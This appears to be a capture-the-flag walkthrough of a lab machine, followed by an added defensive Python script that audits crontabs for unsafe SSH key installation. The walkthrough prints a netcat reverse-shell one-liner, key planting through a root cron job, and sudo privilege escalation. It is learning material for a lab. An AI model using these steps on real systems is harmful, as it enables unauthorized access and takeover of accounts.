- First I ran an nmap scan:
  nmap -sC VM_IP
  The scan showed only 2 open ports: ssh and http. Connecting to the page on the IP did not give me much more info.
- I then tried enumerating the VM with gobuster:
  gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
  With gobuster I found the /mail folder.
- Then I opened the /mail folder, where we find the email correspondence with a .pcap trace file.
- I downloaded the pcap file and opened it with Wireshark. In the trace file I found the new domain where the site is located. I also found the username and password for the login.
- To access the new domain I added VM_IP and the new domain found in the .pcap file to the /etc/hosts file on the attackbox machine.
- I then entered the domain in the web browser, found the login.php script and entered the credentials from the .pcap file.
- After the login you are on a site where you can enter commands. I had to look around the internet for a hint on what to do in this step. In this step we initiate a reverse shell and start an nc listener on the attackbox. I ran:
  rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attackbox_IP 1338 >/tmp/f
  On the attackbox I started the nc listener:
  nc -lvnp 1338
- In a second I got shell access as www-data. After that I checked the cronjob settings and saw that there is a job copying the /opt/.backups/jake_id_rsa.pub.backup public key to the authorized keys. Hmmm, I think we could exploit this one by putting our public key in place of the legit key.
- On the attackbox machine we can create our key pair with the following command:
  ssh-keygen -t rsa -P '' -f jakekey
  Then we open the public key file and copy it to the target machine with:
  echo "public_key_we_created" > jake_id_rsa.pub.backup
  Note that you need to create the file in the /opt/.backups/ folder, and the filename needs to be exactly as stated above, so that the cronjob picks up our file and we can log in to the machine.
- Ok, in this step I tried to log in to the machine using the key. But of course I had forgotten a bit how to do it, so I had to look for a little help on the exact command to use ssh keys to connect to the machine.
  ssh -i jakekey jake@development.smag.thm
  Then I pressed enter and I was logged in as jake. We can now search for the user flag.
  find / -type f -name user.txt 2>/dev/null
- Then I can open the user.txt file and copy the flag.
- Now I was missing only the root flag, and I could access that file only as root. I checked what programs I could run with sudo as the jake user:
  sudo -l
  The output of the command showed us that apt-get can be run with sudo by the jake user.
- To do so we head over to GTFOBins and find the command that we can run as the current user to get root access.
- We can find the root flag at:
  cat /root/root.txt
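The cron job in the walkthrough above is exploitable because a root job installs an SSH key from a file that an unprivileged user can replace. The following script is an added example (not part of the original post) of how a defender would audit a system crontab for exactly this pattern: it finds jobs that copy or redirect into an authorized_keys file and reports why the source file is controllable by someone other than the job's user. The crontab text and the ownership/permission table it checks against are constructed sample data that stand in for a real /etc/crontab and os.stat(), so the script runs offline.

```python
"""Audit system-crontab lines for jobs that install an SSH public key into
an authorized_keys file from a location an unprivileged user can control.

Added example; not code from the original post. SAMPLE_CRONTAB and
SAMPLE_FS are constructed for illustration.
"""
import os
import re
from dataclasses import dataclass, field

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week

# Two common ways a cron job installs a key: `cp SRC DEST` and `cat SRC > DEST`.
COPY_RE = re.compile(r"^cp\s+(?:-\S+\s+)*(\S+)\s+(\S+)$")
REDIRECT_RE = re.compile(r"^cat\s+(\S+)\s*>>?\s*(\S+)$")
AUTH_KEYS_RE = re.compile(r"authorized_keys\d*$")


@dataclass
class Finding:
    line_no: int
    user: str        # account the cron job runs as
    source: str      # file whose contents end up in authorized_keys
    dest: str
    reasons: list = field(default_factory=list)  # why another user could control `source`


def parse_crontab_line(line):
    """Return (user, command) for a system-crontab line, or None for
    blank lines, comments and environment assignments such as SHELL=..."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
        return None
    parts = stripped.split(None, CRON_FIELDS + 1)
    if len(parts) < CRON_FIELDS + 2:
        return None
    return parts[CRON_FIELDS], parts[CRON_FIELDS + 1]


def key_install_targets(command):
    """Yield (source, dest) for every simple command in a cron command line
    that writes into an authorized_keys file."""
    for simple in re.split(r"\s*(?:;|&&|\|\|)\s*", command.strip()):
        for rx in (COPY_RE, REDIRECT_RE):
            m = rx.match(simple)
            if m and AUTH_KEYS_RE.search(m.group(2)):
                yield m.group(1), m.group(2)


def source_risks(source, user, fs):
    """List the ways someone other than `user` could control `source`.
    `fs` maps path -> {"owner": str, "mode": int}; it stands in for os.stat()."""
    reasons = []
    parent = os.path.dirname(source)
    info = fs.get(source)
    if info is None:
        reasons.append("source does not exist; whoever can create it supplies the key")
    else:
        if info["owner"] != user:
            reasons.append(f"source owned by {info['owner']}, not {user}")
        if info["mode"] & 0o022:
            reasons.append("source is group- or world-writable")
    dir_info = fs.get(parent)
    if dir_info is not None and dir_info["mode"] & 0o002:
        reasons.append(f"source directory {parent} is world-writable")
    return reasons


def audit_crontab(text, fs):
    """Return a Finding for every key-installing job, with its risk reasons."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        parsed = parse_crontab_line(line)
        if parsed is None:
            continue
        user, command = parsed
        for source, dest in key_install_targets(command):
            findings.append(Finding(line_no, user, source, dest, source_risks(source, user, fs)))
    return findings


# Constructed sample crontab modelled on the job described in the walkthrough.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
# m h dom mon dow user command
*/1 * * * * root cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys
0 2 * * * root cp /etc/ssh/keys/ops.pub /root/.ssh/authorized_keys
30 * * * * root /usr/bin/apt-get update
"""

# Constructed ownership/permission table standing in for os.stat() results.
SAMPLE_FS = {
    "/opt/.backups": {"owner": "root", "mode": 0o777},  # world-writable directory
    "/opt/.backups/jake_id_rsa.pub.backup": {"owner": "root", "mode": 0o644},
    "/etc/ssh/keys": {"owner": "root", "mode": 0o755},
    "/etc/ssh/keys/ops.pub": {"owner": "root", "mode": 0o644},
}

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FS):
        status = "RISKY" if f.reasons else "review"
        print(f"line {f.line_no} [{status}] {f.user}: {f.source} -> {f.dest}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a real host, replace SAMPLE_FS with a lookup built from os.stat() (owner via pwd.getpwuid, mode via stat.S_IMODE) and feed it /etc/crontab and the files under /etc/cron.d. A job reported with reasons is the misconfiguration to fix: the source must be root-owned in a directory no one else can write to, or, better, keys should not be installed unattended at all. Jobs reported without reasons are still worth reviewing, since any automatic key installation is a standing path to an account.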
AudiTTRSi